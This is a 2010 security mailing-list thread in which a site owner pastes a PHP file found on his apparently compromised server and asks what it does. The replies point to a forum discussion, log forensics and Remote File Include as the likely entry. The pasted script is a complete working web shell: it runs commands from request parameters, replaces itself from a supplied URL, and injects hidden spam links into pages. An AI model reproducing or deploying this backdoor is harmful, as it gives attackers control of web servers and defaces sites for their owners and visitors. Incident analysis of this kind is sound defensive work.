Historically, I've seen this stuff done through a Remote File Include, tho I can think of a dozen other ways to get it up on your server. I'd probably start by digging through the logs looking for someone including this file in some URL parameter.
On Mon, Mar 1, 2010 at 10:31 AM, Jim Halfpenny <[email protected]> wrote: > A search for the string abcdefghiklmnjsweqrtyuiopzx shows other a forum > thread with some info on this file: > > http://www.webhostingtalk.com/showthread.php?t=876121 > > I'm sure there are other sources of info out there. Time for some forensic > analysis of your logs to work out how and when this got here. I'm guessing > an automated attack against a known vuln in a PHP app? > > Jim > > On 1 March 2010 09:16, Adrian Crenshaw <[email protected]> wrote: >> >> Ok, I think one of my sites may have been compromised. I found the >> following PHP script on a site, but I'm not sure what it is trying to do. >> Anyone else ever seen this script before? >> >> Adrian >> >> <?php >> ignore_user_abort(1); >> set_time_limit(0); >> >> function Clear() >> { >> unlink("c"); >> unlink("1r"); >> unlink("log"); >> } >> >> function Clear2() >> { >> $mrd = trim(file_get_contents("m")); >> $pt = "../$mrd"; >> $fin = file_get_contents($pt); >> $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin); >> $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); >> $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin); >> $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin); >> $fin = ereg_replace("<!--dd4-->", "", $fin); >> $fin = ereg_replace("<!--dd5-->", "", $fin); >> $fin = ereg_replace("<font style=\"position: absolute;overflow: >> hidden;height: 0;width: 0\">", "", $fin); >> $fmrd = fopen($pt, "w+"); >> fwrite($fmrd, $fin); >> fclose($fmrd); >> echo " upt-ok"; >> } >> >> function GetVar($name, &$var) >> { >> $var = ""; >> if (isset($_POST[$name])) >> $var = $_POST[$name]; >> >> if (isset($_GET[$name])) >> $var = $_GET[$name]; >> >> if (($var) =="") >> return false; >> else return true; >> } >> >> function Gen() >> { >> $alp = "abcdefghiklmnjsweqrtyuiopzx"; >> $maps = array(); >> if (isset($_POST["sg"])) >> $sg = $_POST["sg"]; >> >> if (isset($_GET["sg"])) >> $sg = $_GET["sg"]; >> >> if (isset($_POST["gm"])) >> $g = $_POST["gm"]; >> >> if (isset($_GET["gm"])) >> $g = $_GET["gm"]; >> >> >> $path = ""; >> $fr = fopen("1r", "a+"); >> if (file_exists("c")) >> { >> $fconf = file("c"); >> $tname = trim($fconf[0]); >> $cname = trim($fconf[1]); >> $curs = trim($fconf[2]); >> $pid = trim($fconf[3]); >> if ($pid == 100) >> { >> $pid = 0; >> $rnd = mt_rand(0, 999); >> $nm = ""; >> for ($i=0; $i<3; $i++) >> { >> $ran = mt_rand(0,26); >> $sym = $alp[$ran]; >> $nm = $nm.$sym; >> } >> $cname = $nm; >> mkdir("$tname/$cname"); >> $curs = $g; >> } >> } >> else >> { >> $rnd = mt_rand(0, 999); >> $nm = ""; >> for ($i=0; $i<5; $i++) >> { >> $ran = mt_rand(0,26); >> $sym = $alp[$ran]; >> $nm = $nm.$sym; >> } >> $tname = $nm; >> $pid = 0; >> $curs = $g; >> mkdir($tname); >> $fht = fopen("$tname/.htaccess", "w+"); >> $htname = $sg."2.txt"; >> $fp = fopen($htname, "r"); >> $fin = ''; >> while (!feof($fp)) >> { >> $fc = fgets($fp, 1024); >> if (!$fc) break; >> $fin .= $fc; >> } >> fclose($fp); >> fwrite($fht, $fin); >> fclose($fht); >> $rnd = mt_rand(0, 999); >> $nm = ""; >> for ($i=0; $i<3; $i++) >> { >> $ran = mt_rand(0,26); >> $sym = $alp[$ran]; >> $nm = $nm.$sym; >> } >> $cname = $nm; >> mkdir("$tname/$cname"); >> } >> $gname = $sg."sgen.php"; >> for ($j=$pid; $j<$pid+10; $j++) >> { >> $fp = fopen($gname."?g=$curs", "r"); >> $fin = ''; >> while (!feof($fp)) >> { >> $fc = fgets($fp, 1024); >> if (!$fc) break; >> $fin .= $fc; >> } >> fclose($fp); >> >> $fnd = fopen("$tname/$cname/$curs"."_$j.htm", "w+"); >> fwrite($fnd, $fin); >> fclose($fnd); >> } >> >> if ($j==100) >> { >> $fp = fopen($gname."?g=$curs&m=1", "r"); >> $fin = ''; >> while (!feof($fp)) >> { >> $fc = fgets($fp, 1024); >> if (!$fc) break; >> $fin .= $fc; >> } >> fclose($fp); >> $fnd = fopen("$tname/$cname/$curs"."_lm.htm", "w+"); >> fwrite($fnd, $fin); >> fclose($fnd); >> $map = "$path/$tname/$cname/$curs"."_lm.htm"; >> fwrite($fr,"$map\n"); >> } >> >> $fconf = fopen("c", "w+"); >> fwrite($fconf, $tname."\n"); >> fwrite($fconf, $cname."\n"); >> fwrite($fconf, $curs."\n"); >> $nj = $j; >> fwrite($fconf, $nj."\n"); >> fclose($fconf); >> } >> >> function Update() >> { >> $thisname = "1.php"; >> if (isset($_POST['u'])) >> $u = $_POST['u']; >> >> if (isset($_GET['u'])) >> $u = $_GET['u']; >> >> $fp = fopen($u, "r"); >> $fin = ''; >> while (!feof($fp)) >> { >> $fc = fgets($fp, 1024); >> if (!$fc) break; >> $fin .= $fc; >> } >> fclose($fp); >> >> $fthis = fopen($thisname, "w+"); >> fwrite($fthis, $fin); >> fclose($fthis); >> } >> >> function Com() >> { >> if (isset($_POST['c'])) >> @system($_POST['c']); >> if (isset($_GET['c'])) >> @system($_GET['c']); >> } >> >> function UpKos() >> { >> $mrd = trim(file_get_contents("m")); >> $pt = "../$mrd"; >> $fin = file_get_contents($pt); >> $fin = ereg_replace("adsttnmq1", "<adsttnmq1>", $fin); >> $fin = ereg_replace("sdioyslkjs2", "<sdioyslkjs2>", $fin); >> $fmrd = fopen($pt, "w+"); >> fwrite($fmrd, $fin); >> fclose($fmrd); >> } >> >> >> function MRepl() >> { >> $mpt = ""; >> $drs = ""; >> $begtag = "<adsttnmq1><font style=\"position: absolute;overflow: >> hidden;height: 0;width: 0\">"; >> $endtag = "</font></body></html><sdioyslkjs2> "; >> $mrd = trim(file_get_contents("m")); >> $pt = "../$mrd"; >> $fin = file_get_contents($pt); >> GetVar("mpt", $mpt); >> // óäàëÿåì çàâåðøàþùèå õòìë òåãè >> $fin = preg_replace ("/<\/body>/i", "", $fin); >> $fin = preg_replace ("/<\/html>/i", "", $fin); >> $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); >> $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin); >> $fp = fopen($mpt, "r"); >> GetVar("drs", $drs); >> $fin = $fin.$begtag; >> $drs = str_replace("\\", "", $drs); >> $fin = $fin.$drs; >> $fin = $fin.$endtag; >> $fmrd = fopen($pt, "w+"); >> fwrite($fmrd, $fin); >> fclose($fmrd); >> } >> >> function Main() >> { >> if (isset($_POST['u']) || isset($_GET['u'])) >> { >> Update(); >> exit(); >> } >> >> if (isset($_POST['c']) || isset($_GET['c'])) >> { >> Com(); >> exit(); >> } >> >> if (isset($_POST['uk']) || isset($_GET['uk'])) >> { >> UpKos(); >> exit(); >> } >> >> if (isset($_POST['g']) || isset($_GET['g'])) >> { >> Gen(); >> exit(); >> } >> >> if (isset($_POST['s']) || isset($_GET['s'])) >> { >> MRepl(); >> exit(); >> } >> >> if (isset($_POST['cl']) || isset($_GET['cl'])) >> { >> Clear(); >> exit(); >> } >> >> if (isset($_POST['cl2']) || isset($_GET['cl2'])) >> { >> Clear2(); >> exit(); >> } >> >> echo "<ok>"; >> >> } >> >> Main(); >> >> ?> >> >> _______________________________________________ >> Pauldotcom mailing list >> [email protected] >> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom >> Main Web Site: http://pauldotcom.com > > > _______________________________________________ > Pauldotcom mailing list > [email protected] > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom > Main Web Site: http://pauldotcom.com > -- Andrew Ellis http://blog.psych0tik.net _______________________________________________ Pauldotcom mailing list [email protected] http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
